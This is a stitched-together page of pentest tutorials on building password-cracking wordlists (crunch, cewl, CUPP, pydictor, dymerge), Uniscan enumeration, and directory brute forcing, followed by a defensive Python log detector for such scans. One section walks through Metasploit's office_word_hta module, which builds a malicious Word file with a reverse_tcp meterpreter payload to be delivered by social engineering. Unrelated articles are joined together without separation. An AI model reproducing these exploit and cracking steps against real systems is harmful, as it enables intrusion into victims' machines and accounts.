[Guide] 5 Ways to Create Dictionary for Bruteforcing
We live in the digital era, and in the world of technology, everything is password protected. There are many ways to crack a password, such as social engineering, the trial and error method, etc., but the two most successful methods of password cracking are the dictionary attack and brute force. Both of them have their perks and disadvantages. In today’s article, we will focus on the dictionary attack, as it comes in handy and is the best method to crack a password.
Table of Content
  • Dictionary attack
  • Crunch
  • Cewl
  • Cupp
  • Pydictor
  • Dymerge
Dictionary attack: A dictionary attack is an attempted entry into a digital system which uses a precompiled list of possible passwords rather than entering them one at a time. Basically, it is an evolved and advanced form of trial and error, as it brings results fast and is efficient. I am sure that there are many ways to perform a dictionary attack, but I am going to give you the five best ones.
Crunch
The first is Crunch. The best thing about crunch is that you can use it both offline and online. It generates a wordlist according to your requirements. You can give the maximum and minimum length of the password and also provide it with a character-set which you want it to use while creating your dictionary. Crunch will then create your dictionary while keeping your requirements as its priority. Hence, a dictionary will be created with all the possible combinations.
Now let’s see how to use it. Observe its syntax first:
crunch <min> <max> <character-set> -t <pattern> -o <path>
crunch – crunch is the keyword which notifies the system to use this tool.
<min> – here you specify the minimum length characters you want.
<max> – here you specify the maximum length of characters.
<character-set> – here you specify the characters you want it to use while creating the dictionary.
-t <pattern> – this is optional, but here you can specify the pattern in which you want your character-set to be.
-o <path> – here you give the path where you want your dictionary file to be saved.
For instance, open the terminal of Kali and type:
crunch 3 4 ignite -o /root/Desktop/dict.txt
The above command will create a dictionary with the possible combinations from the word ignite, with lengths from 3 to 4 characters. The file will be saved in text form on the Desktop. This is shown in the image below:
[Image: 1.png?w=687&ssl=1]
Let’s now read the dict.txt file and for that type:
cat dict.txt
All the words will be displayed in the following manner:
[Image: 2.png?w=687&ssl=1]
Cewl
The next way is by using Cewl. Cewl works somewhat like John The Ripper and is written in Ruby. When targeting people of the corporate sector or the business world, this is the tool for you. As you all know, it is in the human psyche to use words that are significant to them and which occur in their day-to-day life. Cewl works on the URL you provide it. It will take that URL and crawl its way to a depth of 2 links (by default; you can increase or decrease the depth too) and will search for every word which has the possibility of being a password. With all these words it will generate a wordlist for you to use as your dictionary in a dictionary attack. Let’s observe its syntax:
cewl <url> -d<depth> -w<path>
  • cewl – indicates the tool which is being used
  • <url> – here, give the URL that you want to use as a foundation of your dictionary.
  • -d<depth> – here, give the number of links you want it to go through while creating your dictionary.
  • -w<path> – here, give the path where you want to store all the possible passwords.
For example, in the terminal of Kali type:
cewl <url> -d 2 -w /root/Desktop/dict.txt
The above command will create a dictionary file using the words from the URL.
[Image: 3.png?w=687&ssl=1]
Let’s look at the dictionary file it just created and for that type:
cat dict.txt
All the words will be displayed in the following manner:
[Image: 4.png?w=687&ssl=1]
Cupp
Our next way is using a third-party tool, i.e. CUPP. The previous tools were pre-installed, but you will have to install this one on your own. To install it please type:
git clone <url>
[Image: 5.png?w=687&ssl=1]
CUPP is developed in Python and is a very personalized tool when it comes to password cracking. Studies show that while setting up a password, humans show a similar pattern: they tend to personalize the password by adding their date of birth, anniversary date, pet’s name, etc. CUPP focuses on this weakness and helps to crack passwords effectively. Before creating a wordlist, it will ask you for the required information about your target, and it will create the wordlist as per that information. Now, let’s study how it works step-by-step. Initiate cupp first by typing:
./cupp.py -i
Once initiated it will ask you the information about your target as shown in the image:
[Image: 6.png?w=687&ssl=1]
Give the required information and your wordlist will be generated as follows:
[Image: 7.png?w=687&ssl=1]
Pydictor
The next tool is Pydictor. This is a special tool, as it is the only tool that creates the wordlist both in normal words and in base64 encryption. So if someone is smart enough to keep a safe password, this tool will help you with it. Pydictor is written in Python. There are two methods to crack the password using this tool: one creates a normal wordlist, the other creates a wordlist in base64 form. We will try both methods. But first things first, this is a third-party tool, so we will have to install it, and for that please type:
git clone <url>
[Image: 8.png?w=687&ssl=1]
Once the tool is installed and ready to use, give it instructions on the basis of which you want it to generate the wordlist. Understand the syntax first:
./pydictor.py --len <min> <max> -base d -o <path>
  • ./pydictor.py – initiates the tool
  • --len – indicates the length of characters
  • <min> – here, give the minimum length of characters
  • <max> – here, give a maximum length of characters
  • -o – indicates the path
  • <path> – here, give the path where you want your wordlist to be saved
Let’s give the command to generate the wordlist now:
./pydictor.py --len 5 5 --base d -o /root/Desktop/dict.txt
[Image: 9.png?w=687&ssl=1]
Let’s read the file created to have a look at the words that it has generated. And for that type:
cat dict.txt/BASE_5_5_d_071743.txt
[Image: 10.png?w=687&ssl=1]
The other method, using the same tool, gives us passwords in base64 encoding. Let’s study the syntax first:
./pydictor.py --len <min> <max> -base d --encode <encoding type> -o <path>
  • ./pydictor.py – initiates the tool
  • --len – indicates the length of characters
  • <min> – here, give the minimum length of characters
  • <max> – here, give a maximum length of characters
  • --encode – indicates the type of encryption/encoding
  • <encoding type> – here, give the type of encoding you want
  • -o – indicates the path
  • <path> – here, give the path where you want your wordlist to be saved
Let’s give the command to generate the wordlist:
./pydictor.py --len 5 5 -base d --encode b64 -o /root/Desktop/dict.txt
[Image: 11.png?w=687&ssl=1]
The above command will generate the wordlist in base64; let’s have a look at it:
cat dict.txt/BASE_5_5_d_070433.txt
[Image: 12.png?w=687&ssl=1]
Dymerge
The last tool is Dymerge. Dymerge is an interesting and powerful tool made in Python. Basically, what dymerge does is take multiple previously made dictionaries and merge them into a single one, so you can use all the dictionaries in one go while you sit back and relax. You can merge any number of dictionaries, either default ones or custom made. This is again a third-party tool, so let’s install it first:
git clone <url>
[Image: 13.png?w=687&ssl=1]
Let’s understand its syntax:
python dymerge.py <path> <path> -s -o <path>
  • python dymerge.py – initiates the tool
  • <path> – here, give the path of the first dictionary you want to merge
  • <path> – here, give the path of the second dictionary you want to merge
  • -o – indicates the path where the resulting wordlist will be saved
  • <path> – here, give the path where the final wordlist will be saved
Now that we have understood the syntax, let’s try the command:
python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt -s -o /root/Desktop/dict.txt
Here, I have taken two wordlists (you can take more also), where one contains numbers and the other contains alphabets, and merged them into one so you can use multiple dictionaries at the same time.
[Image: 14.png?w=687&ssl=1]
Let’s have a look at the dictionary that it has created:
cat dict-1.txt
[Image: 15.png?w=687&ssl=1]
These are the five powerful and efficient ways of password cracking. Enjoy and explore these for both hacking and recovering passwords. Have fun!

Through this article, we are trying to elaborate on the word Enumeration using the Kali Linux tool UNISCAN.
Uniscan is a simple Remote File Include, Local File Include, and Remote Command Execution vulnerability scanner; it also works as an enumeration tool to gather information such as open ports and protocols related to the target and investigate it for any vulnerability.
Let’s start!!!
Open the terminal and type the following command using the -j option for server fingerprints:
uniscan -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -j
[Image: 1.png?w=687&ssl=1]
It will start enumeration with PING by sending ICMP packets to the targeted server and establishing the connection.
Further, it will use TRACEROUTE to show the path a packet of information takes from source to destination and list all the routers it travels through, or where it fails and is discarded. In actuality, it will inform you how long each ‘hop’ from router to router takes.
[Image: 2.png?w=687&ssl=1]
NSLOOKUP is a program to query Internet domain name servers (DNS). NSLOOKUP or Reverse DNS (rDNS) is a method of resolving an IP address into a domain name.
[Image: 3.png?w=687&ssl=1]
Uniscan makes use of NMAP for an aggressive scan against the targeted server to identify open ports and protocol services; from the screenshot you can observe the result. It also enumerates the target using NMAP NSE scripts to identify vulnerabilities and details of running services.
[Image: 4.png?w=687&ssl=1]
Now type the following command for a dynamic scan against the targeted server using the -d option.
uniscan -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -d
Now it will load the selected plug-ins for fetching more details related to the targeted server.
[Image: 5.png?w=687&ssl=1]
From the given screenshot, you can observe the result, where it came up with an email ID and moreover loaded further plug-ins for scanning vulnerabilities like SQL injection, remote or local file inclusion and XSS.
[Image: 6.png?w=687&ssl=1]
From the screenshot given below you can see it has used blind SQL injection and returned a link to the targeted web pages. Similarly, it will test for XSS and remote or local file inclusion vulnerabilities.
[Image: 7.png?w=687&ssl=1]
Now type the next command using the -q option to enable the directory test on the targeted server:
uniscan -u <url> -q
From the scanning result you can read the fetched directories.
[Image: 8.png?w=687&ssl=1]
Last but not least, use the -g option for web fingerprints with the following command:
uniscan -u <url> -g
Here we have come across the available HTTP options GET, HEAD, POST, OPTION, and TRACE, which might help in verb tampering.
[Image: 9.png?w=687&ssl=1]
It will try to find out web service and error information and type of error as shown in the given image.
[Image: 10.png?w=687&ssl=1]
Here this tool inserts a string in HTML in order to grab the banner; moreover, we have come across the credentials of the web server, and from the given screenshot you can read the login msfadmin: msfadmin
[Image: 11.png?w=687&ssl=1]

In this article, we focus on the directory brute force attack using Kali Linux tools and try to find hidden files and directories inside a web server for penetration testing.
Table of Content
  • What is Path Traversal or Directory Traversal?
  • DIRB
  • Dirbuster
  • Wfuzz
  • Metasploit
  • Dirsearch
What is Path Traversal or Directory Traversal?
A path traversal attack, also known as directory traversal, aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. For more information visit owasp.org
Let’s Start!!!
DIRB
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response. DIRB main purpose is to help in professional web application auditing.
The tool “Dirb” is built into Kali Linux; therefore, open the terminal and type the following command to start the brute force directory attack.
dirb <url>
Hence you can read the fetched directories and files in the given screenshot.
[Image: 1.png?w=687&ssl=1]
DirBuster
DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. DirBuster comes with a total of 9 different lists; this makes DirBuster extremely effective at finding those hidden files and directories.
Similarly, open the terminal and type Dirbuster, then enter the target URL as shown in the image below and browse to /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt for the brute force attack.
Select the option dir to start with /dvwa; once you have configured the tool for the attack, click on start.
[Image: 2.png?w=687&ssl=1]
This will start the brute force attack and dump all files and directories present inside the web server, as shown in the given screenshot.
[Image: 3.png?w=687&ssl=1]
Wfuzz
Wfuzz is a tool designed for bruteforcing web applications. It can be used for finding resources that are not linked (directories, servlets, scripts, etc.), bruteforcing GET and POST parameters to check for different kinds of injections (SQL, XSS, LDAP, etc.), bruteforcing form parameters (User/Password), fuzzing, etc.
wfuzz -c -W /usr/share/wfuzz/wordlist/dir/common.txt --hc 400,404,403 <url>
Here the option -c is used for output with color; -W for the wordlist; --hc for hiding responses with the specified code/lines/words/chars. It is also built into your Kali Linux.
[Image: 4.png?w=687&ssl=1]
Metasploit
HTTP Directory Scanner
This module identifies the existence of interesting directories in a given directory path.
use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set dictionary /usr/share/wordlists/dirb/common.txt
msf auxiliary(dir_scanner) > set rhosts 192.168.1.5
msf auxiliary(dir_scanner) > set path /dvwa
msf auxiliary(dir_scanner) > exploit
[Image: 5.png?w=687&ssl=1]
Dirsearch
Dirsearch is a simple command line tool designed to brute force directories and files in websites. This tool is available on GitHub; after installation in your Kali Linux, type the following to start dirsearch.
./dirsearch.py -u <url> -e php -f -x 400,403,404
Here the option -e is used for generating one entry for the php extension; -x hides responses with the specified code/lines/words/chars.
From the given screenshot, you can read the php files of the targeted web server.
[Image: 6.png?w=687&ssl=1]

For Kali Linux users, we have performed this attack through Metasploit without using any Python script to generate the .rtf file for the attack; thus the user only needs to update their Kali Linux and load the Metasploit framework to start this attack. This is a zero-day exploit that has an excellent rating against the MS Office vulnerability, which can be very easily used to shoot any targeted Windows system.
Attacker: Kali Linux
Target: MS Office
Let’s breach!!
msfconsole
[Image: 1.png?w=687&ssl=1]
This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.
use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set srvhost 192.168.1.8
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set filename sale.doc
msf exploit(office_word_hta) > set lhost 192.168.1.8
msf exploit(office_word_hta) > exploit
This module will automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc; moreover, it will generate a link, and that link must be shared with the target using a social engineering method.
[Image: 2.png?w=687&ssl=1]
When the user opens that link and double-clicks (OLE event) on the .hta file, the attacker will receive a meterpreter session in the Metasploit framework.
meterpreter > sysinfo
[Image: 3.png?w=687&ssl=1]
Reply
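Seen from the server side, the dictionary-based directory scans described in this thread (DIRB, DirBuster, Wfuzz, Dirsearch) appear as one client requesting many distinct paths that mostly return 400, 403 or 404. The following is an added example, not part of the original post: a Python detector run over constructed access-log lines. The log format (Apache/Nginx "combined"), the thresholds and the sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Status codes that the scanners in the post filter out as "not found".
MISS_CODES = {400, 403, 404}

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].split("?", 1)[0]  # ignore the query string
    return m["ip"], ts, path, int(m["status"])


def detect_enumeration(lines, window=timedelta(seconds=60),
                       min_misses=8, min_miss_ratio=0.8):
    """Flag clients whose requests inside a sliding window are mostly misses
    spread over many distinct paths. Thresholds are assumed starting points."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec[0]].append(rec[1:])

    findings = []
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e[0])
        start, best = 0, None
        for end in range(len(events)):
            # Shrink the window until it spans at most `window` of time.
            while events[end][0] - events[start][0] > window:
                start += 1
            win = events[start:end + 1]
            misses = [p for _, p, s in win if s in MISS_CODES]
            distinct = len(set(misses))
            if distinct >= min_misses and len(misses) / len(win) >= min_miss_ratio:
                if best is None or distinct > best["distinct_misses"]:
                    best = {
                        "ip": ip,
                        "distinct_misses": distinct,
                        # Paths that did NOT miss: what the scan found, and
                        # therefore what the defender should review first.
                        "found": sorted({p for _, p, s in win
                                         if s not in MISS_CODES}),
                        "first_seen": win[0][0],
                    }
        if best:
            findings.append(best)
    return sorted(findings, key=lambda f: f["ip"])


def _line(ip, sec, path, status):
    # Helper that builds one constructed "combined"-format log line.
    return (f'{ip} - - [10/Mar/2024:10:00:{sec:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 512 "-" "-"')


# Constructed sample data (documentation address ranges, not real traffic).
SCAN_PATHS = ["/admin", "/backup", "/cgi-bin", "/config", "/db",
              "/includes", "/old", "/phpmyadmin", "/test", "/tmp"]
SAMPLE_LOG = [
    _line("203.0.113.50", i, p, 200 if p == "/config" else 404)
    for i, p in enumerate(SCAN_PATHS)
] + [
    _line("198.51.100.7", 5, "/index.php", 200),
    _line("198.51.100.7", 9, "/favicon.ico", 404),
    _line("198.51.100.7", 30, "/login.php", 200),
]

if __name__ == "__main__":
    for finding in detect_enumeration(SAMPLE_LOG):
        print(finding)
```

The `found` list is the part worth acting on: it names the paths the scanning client received a non-error response for, which are the candidates for access control review or removal.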






